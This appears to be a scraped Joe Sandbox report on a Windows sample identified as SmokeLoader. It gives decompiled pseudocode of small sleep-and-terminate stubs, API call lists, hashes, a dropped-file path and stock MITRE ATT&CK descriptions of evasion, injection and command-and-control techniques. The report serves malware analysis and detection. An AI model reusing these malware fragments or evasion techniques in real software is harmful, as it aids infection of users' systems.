C-Code - Quality: 20%

			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t10;
				void* _t13;
				intOrPtr* _t19;
				void* _t22;
				void* _t25;

				_t26 = __eflags;
				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
				_t19 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				if(_t13 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t13);
					_push(_t19); // executed
					L00401455(0x60, _t22, __edi); // executed
				}
				 *_t19(0xffffffff, 0); // executed
				_t19 = _t19 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401834
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rudwaguPID: 5400, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	46.2%
Total number of Nodes:	13
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00729CB9 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00729CE1
Module32First.KERNEL32(00000000,00000224), ref: 00729D01

Memory Dump Source

Source File: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, Offset: 00722000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_722000_rudwagu.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 8ae90e93a0a485bd139706e740db5a66e7af6acad873950b8f07e3e9cda1883b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 17F096316007246BD7203BF9BC8DBAE76ECAF49724F180529E746D14C0DB74EC854671

Uniqueness

Uniqueness Score: -1.00%

Function 00729978 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007299C9

Memory Dump Source

Source File: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, Offset: 00722000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_722000_rudwagu.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 3997b8332eafcfadacae3ac48453c932a61b1ab10ebe85974d32353d2488128b
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D7113F79A00208EFDB01DF98C985E98BBF5EF08350F198094FA489B361D375EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rudwaguPID: 1324, Parent PID: 5400COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040180C Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				void* _t16;
				intOrPtr* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t22 = __eflags;
				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
				_t17 = _a4;
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, _t20); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401818 Relevance: 3.0, APIs: 2, Instructions: 45
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401822 Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("out 0x95, eax");
				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("sbb ebx, ebp");
				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t10;
				void* _t13;
				intOrPtr* _t19;
				void* _t22;
				void* _t25;

				_t26 = __eflags;
				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
				_t19 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				if(_t13 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t13);
					_push(_t19); // executed
					L00401455(0x60, _t22, __edi); // executed
				}
				 *_t19(0xffffffff, 0); // executed
				_t19 = _t19 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\rudwagu

C:\Users\user\AppData\Roaming\rudwagu:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Function 004058A1 Relevance: 49.3, APIs: 12, Strings: 16, Instructions: 292
librarypipeCOMMON

Function 008E0110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Function 00404EC6 Relevance: 84.5, APIs: 24, Strings: 24, Instructions: 460
memoryCOMMON

Function 008E0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Function 00404E1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33
librarymemoryloaderCOMMON

Function 008E05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Function 0040CB55 Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Function 00404B4D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
libraryCOMMON

Function 004074C4 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 0040BB1B Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Function 0040DAC5 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Function 0040C824 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00404D37 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 76
libraryCOMMON

Function 0040B5C9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 137
COMMONLIBRARYCODE

Function 00404BB7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
pipeCOMMON

Function 00416028 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Function 004163D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMONLIBRARYCODE

Function 00415D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Function 0040E92F Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Function 0040617D Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Function 00410C88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Function 0040DEDE Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Function 00410B74 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Function 0040F09B Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Function 00408E9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON